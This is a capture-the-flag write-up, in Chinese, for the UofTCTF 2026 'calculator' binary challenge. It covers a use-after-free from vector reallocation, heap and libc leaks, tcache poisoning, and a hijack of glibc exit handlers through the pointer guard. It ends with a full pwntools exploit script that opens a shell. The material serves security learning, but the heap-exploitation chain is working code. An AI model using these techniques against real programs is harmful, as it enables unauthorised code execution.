2026 UoFCTF - caculator

Author: 堇姬 Naup

前言

前幾天 @consolebreak 跑來問我這題,看了一下好像蠻有趣的就來寫了一下,沒想到我就這樣卡住了兩天,最後還是解出來了,其中主要卡在最後拿到任意寫後,unordered map 內的 std::string 拿到了非法位置的 pointer,最後解構要去釋放時候會觸發 glibc 檢查導致 crash,以至於沒辦法打 IO_FILE,如果有人知道怎麼打 IO_FILE 在這題可以私訊我XD
總之好玩,最後找到可以用一個酷酷的地方來 get shell

Analyze source code

https://github.com/UofTCTF/uoftctf-2026-chals-public/tree/main/calculator

這是一個 C++ 的 binary pwn,有一個很神秘的通過 unordered map 來記憶 expression 的結果並去計算
其中的問題是傳入的 vector 是一個 pointer,但如果在過程中, vector 發生擴容,那就會用到舊的 address,導致 UAF 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#include <iostream>
#include <unordered_map>
#include <string>
#include <algorithm>

class Int128 {
public:
    __int128 v;
    Int128(__int128 x = 0) : v(x) {}

    static Int128 fromstring(const std::string& s) {
        __int128 val = 0;
        for (char c : s) val = val * 10 + (c - '0');
        return Int128(val);
    }

    std::string tostring() const {
        if (v == 0) return "0";
        __int128 x = v;
        bool neg = false;
        if (x < 0) { neg = true; x = -x; }
        std::string s;
        while (x) { s.push_back('0' + x % 10); x /= 10; }
        if (neg) s.push_back('-');
        reverse(s.begin(), s.end());
        return s;
    }

    Int128 operator+(const Int128& o) const { return Int128(v + o.v); }
    Int128 operator-(const Int128& o) const { return Int128(v - o.v); }
    Int128 operator*(const Int128& o) const { return Int128(v * o.v); }
    Int128 operator/(const Int128& o) const {
        if (o.v == 0) throw std::runtime_error("Division by zero");
        return Int128(v / o.v);
    }
};


enum class Op { ADD, SUB, MUL, DIV };

std::unordered_map<std::string, size_t> memo;
std::vector<Int128> memo_vec;

size_t getMemo(const std::string& s) {
    if (!memo.count(s))
        memo[s] = memo_vec.size();
    memo_vec.push_back(0);
    return memo[s];
}

bool isNumber(const std::string& s) {
    for (char c : s) if (!isdigit(c)) return false;
    return true;
}

Int128 eval(const std::string& L, Op op, const std::string& R, Int128& memo_l, Int128& memo_r);

Int128 evalAtom(const std::string& s, Int128& memo_s) {
    if (isNumber(s)) {
        memo_s = Int128::fromstring(s);
        return memo_s;
    }

    // find lowest-precedence operator from right
    int best = -1, prec = 10;
    for (int i = 0; i < s.size(); i++) {
        int p = (s[i]=='+'||s[i]=='-') ? 1 :
                (s[i]=='*'||s[i]=='/') ? 2 : 100;
        if (p <= prec) { prec = p; best = i; }
    }

    if (best == -1) {
        throw std::runtime_error("Bad expression");
    }

    std::string L = s.substr(0, best);
    L.erase(remove_if(L.begin(), L.end(), ::isspace), L.end());
    std::string R = s.substr(best+1);
    R.erase(remove_if(R.begin(), R.end(), ::isspace), R.end());

    Op op = (s[best] == '+') ? Op::ADD :
            (s[best] == '-') ? Op::SUB :
            (s[best] == '*') ? Op::MUL : Op::DIV;

    memo_s = eval(L, op, R, memo_vec[getMemo(L)], memo_vec[getMemo(R)]);
    return memo_s;
}

Int128 eval(const std::string& L, Op op, const std::string& R, Int128& memo_l, Int128& memo_r) {
    if (memo_l.v == 0)
        memo_l = evalAtom(L, memo_l);
    if (memo_r.v == 0)
        memo_r = evalAtom(R, memo_r);
    Int128 res;
    if (op == Op::ADD) res = memo_l + memo_r;
    else if (op == Op::SUB) res = memo_l - memo_r;
    else if (op == Op::MUL) res = memo_l * memo_r;
    else res = memo_l / memo_r;

    return res;
}

int main() {
    setvbuf(stdin,NULL,_IONBF,0);
    setvbuf(stdout,NULL,_IONBF,0);

    while (true) {
        std::string s;
        std::cout << "Enter expression (or quit): ";
        getline(std::cin, s);
        if (s == "quit") {
            std::cout << "Bye!" << std::endl;
            return 0;
        }
        if (s == "reset") {
            memo = std::unordered_map<std::string, size_t>();
            memo_vec = std::vector<Int128>();
            continue;
        }
        try {
            std::string res = evalAtom(s, memo_vec[getMemo(s)]).tostring();
            std::cout << "Result = " << res << std::endl;
        } catch (std::exception& e) {
            std::cout << "Error: " << e.what() << std::endl;
        }
    }
}

challenge

基本上就是通過 UAF 先去通過 result leak 資料,情境是 memo_s = eval(L, op, R, memo_vec[getMemo(L)], memo_vec[getMemo(R)]);,需要讓左邊剛好擴容時候,去算右邊,這樣右邊就會用到舊的,並且他要是第一個才能 leak fd/bk 上的 heap pointer
另外一邊則是先將 heap vector 一路往上加到 free 後會進入 unsorted bin,剩下的就是一樣的方法
要 UAF 寫入 free chunk 則需要剛好 memo_s 是舊的 pointer,排一下就行了,我們希望寫入一個 pointer 來打 tcache poinsoning,我選擇將他 allocate 到 tcache_pthread_struct 上,來控制更多 entry 下一個會 allocate 的 chunk (上面的需要去平衡一下 cnt,需要預先讓 std::string allocate 一些之後 reset 讓這些都被 free 到 tcache entry)
我們可以通過這樣做出兩次任意寫,但我們拿到一個非法位置 chunk 後,如果想打 IO_FILE,當我 exit,__run_exit_handler 會去從 initial 內拿出解構子來去釋放一些 pointer,其中就有非法 pointer 會導致 free 失敗
因此我選擇直接控制 fs_base + 0x30 上的 key,跟 initial 結構

https://elixir.bootlin.com/glibc/glibc-2.41/source/stdlib/exit.c#L108

1
2
3
4
5
6
7
8
9
10
11
  case ef_cxa:
    /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free.  */
    f->flavor = ef_free;
    cxafct = f->func.cxa.fn;
    arg = f->func.cxa.arg;
    PTR_DEMANGLE (cxafct);

    /* Unlock the list while we call a foreign function.  */
    __libc_lock_unlock (__exit_funcs_lock);
    cxafct (arg, status);

這邊將 fs_base 控制成都是 0,他會將 exit_function 上的 function pointer (0x10) 拿出來 xor fs:[0x30],之後右移 0x11,另外 arg 是 0x18,控制成 /bin/sh address 就可以在解構時候成功開 shell

上述的結構其實就是這兩個結構
https://elixir.bootlin.com/glibc/glibc-2.41/source/stdlib/exit.h#L55

1
2
3
4
5
6
struct exit_function_list
  {
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
  };

https://elixir.bootlin.com/glibc/glibc-2.41/source/stdlib/exit.h#L34

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
	void (*at) (void);
	struct
	  {
	    void (*fn) (int status, void *arg);
	    void *arg;
	  } on;
	struct
	  {
	    void (*fn) (void *arg, int status);
	    void *arg;
	    void *dso_handle;
	  } cxa;
      } func;
  };

這部分就是 assembly 那段 exit 的部分,rax 會指向 initial,最後解密 pointer 後去跳對應 function

1
2
3
4
5
6
7
8
9
10
11
12
13
0x76af98294240 <__run_exit_handlers+448>:    mov    rcx,QWORD PTR [rax+0x18]
0x76af98294244 <__run_exit_handlers+452>:    mov    r8,QWORD PTR [rax+0x20]
0x76af98294248 <__run_exit_handlers+456>:    mov    QWORD PTR [rax+0x10],0x0
0x76af98294250 <__run_exit_handlers+464>:    mov    rax,rcx
0x76af98294253 <__run_exit_handlers+467>:    xor    ecx,ecx
0x76af98294255 <__run_exit_handlers+469>:    ror    rax,0x11
0x76af98294259 <__run_exit_handlers+473>:    xor    rax,QWORD PTR fs:0x30
0x76af98294262 <__run_exit_handlers+482>:    xchg   DWORD PTR [rbx],ecx
0x76af98294264 <__run_exit_handlers+484>:    cmp    ecx,0x1
0x76af98294267 <__run_exit_handlers+487>:    jg     0x76af98294290 <__run_exit_handlers+528>
0x76af98294269 <__run_exit_handlers+489>:    mov    rdi,r8
0x76af9829426c <__run_exit_handlers+492>:    mov    esi,r13d
0x76af9829426f <__run_exit_handlers+495>:    call   rax

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
from pwn import *
import time

def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

def p(r):
    gdb.attach(r)

def p_c(r,cmd):
    gdb.attach(r,cmd)

def split_nc(nc_str):
    nc_str=nc_str.split(" ")
    return [nc_str[1],nc_str[2]]

context(arch = 'amd64', os = 'linux')


REMOTE_LOCAL=input("local?(y/n):")

if REMOTE_LOCAL=="y":
    r=process('./chall')
    a=input('open debug?(y/n/srop)')
    if a=='y':
        # context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h']

    elif a=='srop':
        context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']
    
else:                                           
    REMOTE_INFO=split_nc("nc naup.com 2000")

    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])

    r=remote(REMOTE_IP,REMOTE_PORT)

### attach
if input('attach?(y/n)') == 'y':
    p(r)

### exploit
r.sendlineafter(b'Enter expression (or quit): ',b'1')
r.sendlineafter(b'Enter expression (or quit): ',b'2')
r.sendlineafter(b'Enter expression (or quit): ',b'1+2+1')

r.recvuntil(b'Result = ')
leakheap = int(r.recvline().strip()) % (1 << 128) & 0xffffffffffffffff
heapbase = (leakheap << 12) - 0x15000

print("[!] leakheap:", hex(leakheap))
print("[!] heapbase:", hex(heapbase))

r.sendlineafter(b'Enter expression (or quit): ',b'reset')
r.sendlineafter(b'Enter expression (or quit): ',b'1')
r.sendlineafter(b'Enter expression (or quit): ',b'2')

for i in range(124):
    r.sendlineafter(b'Enter expression (or quit): ',b'0')

r.sendlineafter(b'Enter expression (or quit): ',b'1+2+1')
r.recvuntil(b'Result = ')
leaklibc = int(r.recvline().strip()) % (1 << 128) & 0xffffffffffffffff
libcbase = leaklibc - 0x210b23

print("[!] leaklibc:", hex(leaklibc))
print("[!] libcbase:", hex(libcbase))

r.sendlineafter(b'Enter expression (or quit): ',b'reset')

r.sendlineafter(b'Enter expression (or quit): ',b'2' * 0xc0)
r.sendlineafter(b'Enter expression (or quit): ',b'a' * 0x10)
r.sendlineafter(b'Enter expression (or quit): ',b'reset')

r.sendlineafter(b'Enter expression (or quit): ',b'2' * 0xb0)
r.sendlineafter(b'Enter expression (or quit): ',b'reset')

chunk_addr = heapbase + 0x12880
IO_list_all = libcbase + 0x2114c0
main_arena = heapbase + 0xe0
encrypt_ptr = (chunk_addr >> 12) ^ (main_arena)

num1 = str(encrypt_ptr).encode()
num2 = str(0x0).encode()

num_expr =  b"0" * 0x10 + num1 + b'+0'

r.sendlineafter(b'Enter expression (or quit): ', num_expr)

print("[!] encrypt_ptr:", hex(encrypt_ptr))
print("[!] writable:", hex(IO_list_all))
print("[!] main_arena:", hex(main_arena))

r.sendlineafter(b'Enter expression (or quit): ',b'1' * 0x10)

control_flow = libcbase + 0x4d20e0 + 0x40
fs_base = libcbase - 0xfb850
initial = libcbase + 0x2120f0
libc_system = libcbase + 0x5c110
libc_bin_sh = libcbase + 0x1d84ab
print("[!] fs_base:", hex(fs_base))
print("[!] initial:", hex(initial))

r.sendlineafter(b'Enter expression (or quit): ', p64(fs_base) + p64(initial))
r.sendlineafter(b'Enter expression (or quit): ', b"\x00" * 0xb0)
r.sendlineafter(b'Enter expression (or quit): ', p64(0x4) + p64(libc_system << 0x11) + p64(libc_bin_sh)+ b"a" * (0xc0 - 0x18))
r.sendlineafter(b'Enter expression (or quit): ',b'quit')

### interactive
ita()

ref

https://www.kn0sky.com/?p=d400e21d-6a46-4fa0-bce8-81a5a7328c83